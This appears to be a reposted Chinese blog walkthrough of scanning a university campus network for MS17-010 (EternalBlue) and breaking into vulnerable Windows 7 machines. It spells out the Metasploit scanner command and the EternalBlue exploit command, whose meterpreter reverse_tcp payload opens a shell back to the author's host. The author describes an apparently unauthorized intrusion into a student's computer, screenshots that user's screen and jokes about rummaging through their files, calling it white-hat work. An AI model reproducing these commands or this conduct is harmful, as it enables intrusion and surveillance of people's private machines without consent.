實戰!利用MSF批量掃描校園網中含有MS17_010漏洞的主機並入侵


利用ms17_010的永恆之藍在前些日子火爆了一段時間,校園網中也聲稱封鎖了相應端口。最近在搞MSF的深入學習,於是有了下文。

ms17_010掃描工具

msf中的輔助模塊含有一個強大的ms17_010掃描工具:

 

auxiliary/scanner/smb/smb_ms17_010

 

使用這個工具可以快速掃描某個網段中含有ms17_010漏洞的主機,該工具的使用也很簡單。

首先確定要掃描的網段,以我學校的校園局域網為例,要掃描的網段為10.31.0.0/16。實際上經過測試,只需掃描10.31.0-128.1-254 就可以了。

具體的命令如下:

 

use auxiliary/scanner/smb/smb_ms17_010 set rhosts 10.31.0-128.1-254 set threads 512 exploit

ms17_010掃描

掃描的部分結果如下圖所示:

ms17_010 部分掃描結果

上圖中,左側有綠色加號標記的主機並且被識別出來是Windows 7的主機有很大概率存在該漏洞。如果被識別出是Windows 8 或者 Windows 10的主機,基本上是不能成功的。當嘗試完Windows 7 的后,如果還沒有一台可以入侵的,可以繼續嘗試那些左側是紅色減號並且沒有識別出系統版本的。

好了,目標主機有了,下面就是開始入侵了!

利用ms17_010入侵主機

msf中的exploit模塊中含有ms17_010的利用工具:

 

exploit/windows/smb/ms17_010_eternalblue

該工具的使用也很簡單,只要設置好目標主要的ip和payload就可以exploit了。

 

需要注意的是,在使用該exploit入侵主機時,如果一次不能成功,盡量不要嘗試第二次了,這樣很容易把目標主機搞崩潰。

具體的命令如下:

use exploit/windows/smb/ms17_010_eternalblue set rhost 10.31.36.66 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.31.30.49 set lport 4567 exploit

以上命令中的10.31.36.66為目標主機,監聽反連的主機ip為10.31.30.49,也就是自己的主機ip,監聽的端口為4567端口。

不過上面那台主機並沒有成功,下面是另外一台成功入侵的截圖:

成功入侵

可以上面中的10.31.36.103 主機被成功入侵了:)。

然后輸入screenshot截個圖看看主人在干什么吧。

screenshot

入侵計算機的屏幕截圖

好吧,在看LOL比賽 0.0 。

我還是簡單看看機子上有沒動作片好下載,然后上傳個txt提醒他修復漏洞好了。我們都是有操守的白帽子對吧:)。

至此,利用MSF對ms17_010漏洞主機的發現和入侵過程就結束了,通過這些對校園網的掃描,發現還是有大部分主機是存在該漏洞的。。。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM